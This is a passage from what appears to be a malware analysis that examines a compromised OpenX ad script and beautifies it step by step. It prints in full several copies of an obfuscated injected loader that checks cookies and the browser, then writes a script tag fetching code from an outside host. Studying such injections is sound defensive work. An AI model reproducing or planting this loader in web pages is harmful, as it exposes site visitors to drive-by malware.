$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt--><"+"a href=\'http://ad.same-story.com/delivery/ck.php?oaparams=2__bannerid=155__zoneid=9__cb=956c2f8948__oadest=http%3A%2F%2Fhome.edt02.net%2Femc%2Fbanner%2Fmstbc.php%3Fc%3D40060-195305-99922-0-335287\' target=\'_blank\'><"+"img src=\'http://ad.same-story.com/images/9b4c7c85bcd76a4593020663b97f5dec.gif\' width=\'300\' height=\'250\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt--><"+"/div>\n";
OX_0f4f918e += "<"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OX_0f4f918e += "var ox_swf = new FlashObject(\'http://ad.same-story.com/images/abcf302d1728cb4ec9ebbc5360497402.swf\', \'Advertisement\', \'300\', \'250\', \'9\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTARGET\', \'_blank\');\n";
OX_0f4f918e += "ox_swf.addVariable(\'clickTAG\', \'http%3A%2F%2Fad.same-story.com%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D155__zoneid%3D9__cb%3D956c2f8948__oadest%3Dhttp%253A%252F%252Fhome.edt02.net%252Femc%252Fbanner%252Fmstbc.php%253Fc%253D40060-195305-99922-0-335287\');\n";
OX_0f4f918e += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";
OX_0f4f918e += "ox_swf.write(\'ox_64ea63b5f76eb3c481ad44a961e2c479\');\n";
OX_0f4f918e += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&amp;campaignid=27&amp;zoneid=9&amp;cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); } else { document.write(\"<"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&amp;campaignid=27&amp;zoneid=9&amp;fb=1&amp;cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); }\n";
OX_0f4f918e += "// ]]> --><"+"/script><"+"noscript><"+"div id=\'beacon_956c2f8948\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.same-story.com/delivery/lg.php?bannerid=155&amp;campaignid=27&amp;zoneid=9&amp;fb=1&amp;cb=956c2f8948\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"/noscript><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt-->\n";
document.write(OX_0f4f918e);
...well isn't that ugly? Let's see if we can gussy it up a bit. JSBeautifier to the rescue! One pass adds some formatting to the code and makes it much easier to read. Let's see if we can't make some sense out of it now – we'll take it step by step.

Step 2: Initial Analysis

This first bit just declares an object named "org.openx.SWFObjectUtil" for the script to use:
if (typeof org == "undefined") {
    var org = new Object();
}
if (typeof org.openx == "undefined") {
    org.openx = new Object();
}
if (typeof org.openx.util == "undefined") {
    org.openx.util = new Object();
}
if (typeof org.openx.SWFObjectUtil == "undefined") {
    org.openx.SWFObjectUtil = new Object();
}
Next, it assigns some functionality to the object. It looks like this will detect whether or not Flash is installed, check its version, and trigger an install under certain conditions:
org.openx.SWFObject = function(_1, id, w, h, _5, c, _7, _8, _9, _a) {
    if (!document.getElementById) {
        return;
    }
    this.DETECT_KEY = _a ? _a : "detectflash";
    this.skipDetect = org.openx.util.getRequestParameter(this.DETECT_KEY);
    this.params = new Object();
    this.variables = new Object();
    this.attributes = new Array();
    if (_1) {
        this.setAttribute("swf", _1);
    }
    if (id) {
        this.setAttribute("id", id);
    }
    if (w) {
        this.setAttribute("width", w);
    }
    if (h) {
        this.setAttribute("height", h);
    }
    if (_5) {
        this.setAttribute("version", new org.openx.PlayerVersion(_5.toString().split(".")));
    }
    this.installedVer = org.openx.SWFObjectUtil.getPlayerVersion();
    if (!window.opera && document.all && this.installedVer.major > 7) {
        org.openx.SWFObject.doPrepUnload = true;
    }
    if (c) {
        this.addParam("bgcolor", c);
    }
    var q = _7 ? _7 : "high";
    this.addParam("quality", q);
    this.setAttribute("useExpressInstall", false);
    this.setAttribute("doExpressInstall", false);
    var _c = (_8) ? _8 : window.location;
    this.setAttribute("xiRedirectUrl", _c);
    this.setAttribute("redirectUrl", "");
    if (_9) {
        this.setAttribute("redirectUrl", _9);
    }
};
Next we have a code block that prototypes the object to add more functionality to it. In this case, it seems to be doing some browser checks to determine the right HTML code to output for the browser to render a Flash file:
org.openx.SWFObject.prototype = {
    useExpressInstall: function(_d) {
        this.xiSWFPath = !_d ? "expressinstall.swf" : _d;
        this.setAttribute("useExpressInstall", true);
    },
    setAttribute: function(_e, _f) {
        this.attributes[_e] = _f;
    },
    getAttribute: function(_10) {
        return this.attributes[_10];
    },
    addParam: function(_11, _12) {
        this.params[_11] = _12;
    },
    getParams: function() {
        return this.params;
    },
    addVariable: function(_13, _14) {
        this.variables[_13] = _14;
    },
    getVariable: function(_15) {
        return this.variables[_15];
    },
    getVariables: function() {
        return this.variables;
    },
    getVariablePairs: function() {
        var _16 = new Array();
        var key;
        var _18 = this.getVariables();
        for (key in _18) {
            _16[_16.length] = key + "=" + _18[key];
        }
        return _16;
    },
    getSWFHTML: function() {
        var _19 = "";
        if (navigator.plugins && navigator.mimeTypes && navigator.mimeTypes.length) {
            if (this.getAttribute("doExpressInstall")) {
                this.addVariable("MMplayerType", "PlugIn");
                this.setAttribute("swf", this.xiSWFPath);
            }
            _19 = "<embed type=\"application/x-shockwave-flash\" src=\"" + this.getAttribute("swf") + "\" width=\"" + this.getAttribute("width") + "\" height=\"" + this.getAttribute("height") + "\" style=\"" + this.getAttribute("style") + "\"";
            _19 += " id=\"" + this.getAttribute("id") + "\" name=\"" + this.getAttribute("id") + "\" ";
            var _1a = this.getParams();
            for (var key in _1a) {
                _19 += [key] + "=\"" + _1a[key] + "\" ";
            }
            var _1c = this.getVariablePairs().join("&");
            if (_1c.length > 0) {
                _19 += "flashvars=\"" + _1c + "\"";
            }
            _19 += "/>";
        } else {
            if (this.getAttribute("doExpressInstall")) {
                this.addVariable("MMplayerType", "ActiveX");
                this.setAttribute("swf", this.xiSWFPath);
            }
            _19 = "<object id=\"" + this.getAttribute("id") + "\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"" + this.getAttribute("width") + "\" height=\"" + this.getAttribute("height") + "\" style=\"" + this.getAttribute("style") + "\">";
            _19 += "<param name=\"movie\" value=\"" + this.getAttribute("swf") + "\" />";
            var _1d = this.getParams();
            for (var key in _1d) {
                _19 += "<param name=\"" + key + "\" value=\"" + _1d[key] + "\" />";
            }
            var _1f = this.getVariablePairs().join("&");
            if (_1f.length > 0) {
                _19 += "<param name=\"flashvars\" value=\"" + _1f + "\" />";
            }
            _19 += "</object>";
        }
        return _19;
    },
    write: function(_20) {
        if (this.getAttribute("useExpressInstall")) {
            var _21 = new org.openx.PlayerVersion([6, 0, 65]);
            if (this.installedVer.versionIsValid(_21) && !this.installedVer.versionIsValid(this.getAttribute("version"))) {
                this.setAttribute("doExpressInstall", true);
                this.addVariable("MMredirectURL", escape(this.getAttribute("xiRedirectUrl")));
                document.title = document.title.slice(0, 47) + " - Flash Player Installation";
                this.addVariable("MMdoctitle", document.title);
            }
        }
        if (this.skipDetect || this.getAttribute("doExpressInstall") || this.installedVer.versionIsValid(this.getAttribute("version"))) {
            var n = (typeof _20 == "string") ? document.getElementById(_20) : _20;
            n.innerHTML = this.getSWFHTML();
            return true;
        } else {
            if (this.getAttribute("redirectUrl") != "") {
                document.location.replace(this.getAttribute("redirectUrl"));
            }
        }
        return false;
    }
};
These parts do some more version checking:
org.openx.SWFObjectUtil.getPlayerVersion = function() {
    var _23 = new org.openx.PlayerVersion([0, 0, 0]);
    if (navigator.plugins && navigator.mimeTypes.length) {
        var x = navigator.plugins["Shockwave Flash"];
        if (x && x.description) {
            _23 = new org.openx.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/, "").replace(/(\s+r|\s+b[0-9]+)/, ".").split("."));
        }
    } else {
        if (navigator.userAgent && navigator.userAgent.indexOf("Windows CE") >= 0) {
            var axo = 1;
            var _26 = 3;
            while (axo) {
                try {
                    _26++;
                    axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash." + _26);
                    _23 = new org.openx.PlayerVersion([_26, 0, 0]);
                } catch (e) {
                    axo = null;
                }
            }
        } else {
            try {
                var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
            } catch (e) {
                try {
                    var axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
                    _23 = new org.openx.PlayerVersion([6, 0, 21]);
                    axo.AllowScriptAccess = "always";
                } catch (e) {
                    if (_23.major == 6) {
                        return _23;
                    }
                }
                try {
                    axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
                } catch (e) {}
            }
            if (axo != null) {
                _23 = new org.openx.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));
            }
        }
    }
    return _23;
};
org.openx.PlayerVersion = function(_29) {
    this.major = _29[0] != null ? parseInt(_29[0]) : 0;
    this.minor = _29[1] != null ? parseInt(_29[1]) : 0;
    this.rev = _29[2] != null ? parseInt(_29[2]) : 0;
};
org.openx.PlayerVersion.prototype.versionIsValid = function(fv) {
    if (this.major < fv.major) {
